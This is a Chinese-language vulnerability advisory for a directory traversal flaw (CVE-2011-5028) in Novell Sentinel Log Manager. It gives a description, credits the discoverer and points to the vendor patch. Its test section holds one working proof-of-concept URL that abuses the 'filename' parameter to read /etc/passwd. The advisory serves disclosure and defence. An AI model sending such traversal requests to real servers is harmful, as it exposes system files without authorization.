Novell Sentinel Log Manager “filename”参数目录遍历漏洞
Novell Sentinel Log Manager “filename”参数目录遍历漏洞
发布日期:2011-12-18
更新日期:2012-02-10
受影响系统:
Novell Sentinel Log Manager
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51104
CVE ID: CVE-2011-5028
Novell Sentinel Log Manager是一个日志管理软件。
Sentinel Log Manager在实现上存在目录遍历漏洞,成功利用后可允许攻击者获取敏感信息。
<*来源:Andrea Fabrizi (andrea.fabrizi@gmail.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd
建议:
--------------------------------------------------------------------------------
厂商补丁:
Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://support.novell.com/security-alerts
评论暂时关闭